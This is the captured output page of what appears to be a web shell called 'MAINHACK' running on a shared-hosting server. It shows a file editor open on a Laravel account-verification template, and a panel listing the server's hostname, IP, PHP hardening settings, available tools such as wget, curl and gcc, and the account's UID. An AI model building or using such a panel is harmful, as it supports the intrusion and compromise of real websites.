[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: verification.blade.php
@extends(getTemplate().'.layouts.app') @section('content') <div class="container"> <div class="row login-container"> <div class="col-12 col-md-6 pl-0"> <img src="{{ getPageBackgroundSettings('verification') }}" class="img-cover" alt="Login"> </div> <div class="col-12 col-md-6"> <div class="login-card"> <h1 class="font-20 font-weight-bold">{{ trans('auth.account_verification') }}</h1> <p>{{ trans('auth.account_verification_hint',['username' => $username]) }}</p> <form method="post" action="/verification" class="mt-35"> <input type="hidden" name="_token" value="{{ csrf_token() }}"> <input type="hidden" name="username" value="{{ $usernameValue }}"> <div class="form-group"> <label class="input-label" for="code">{{ trans('auth.code') }}:</label> <input type="tel" name="code" class="form-control @error('code') is-invalid @enderror" id="code" aria-describedby="codeHelp"> @error('code') <div class="invalid-feedback"> {{ $message }} </div> @enderror </div> <button type="submit" class="btn btn-primary btn-block mt-20">{{ trans('auth.verification') }}</button> </form> <div class="text-center mt-20"> <span class="text-secondary"> <a href="/verification/resend" class="font-weight-bold">{{ trans('auth.resend_code') }}</a> </span> </div> </div> </div> </div> </div> @endsection
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: premium320.web-hosting.com
Server IP: 66.29.153.54
PHP Version: 8.2.29
Server Software: LiteSpeed
System: Linux premium320.web-hosting.com 4.18.0-553.50.1.lve.el8.x86_64 #1 SMP Thu Apr 17 19:10:24 UTC 2025 x86_64
HDD Total: 97.87 GB
HDD Free: 76.84 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
No
git:
Yes
User Info
Username: aoneqssk
User ID (UID): 1285
Group ID (GID): 1290
Script Owner UID: 1285
Current Dir Owner: 1285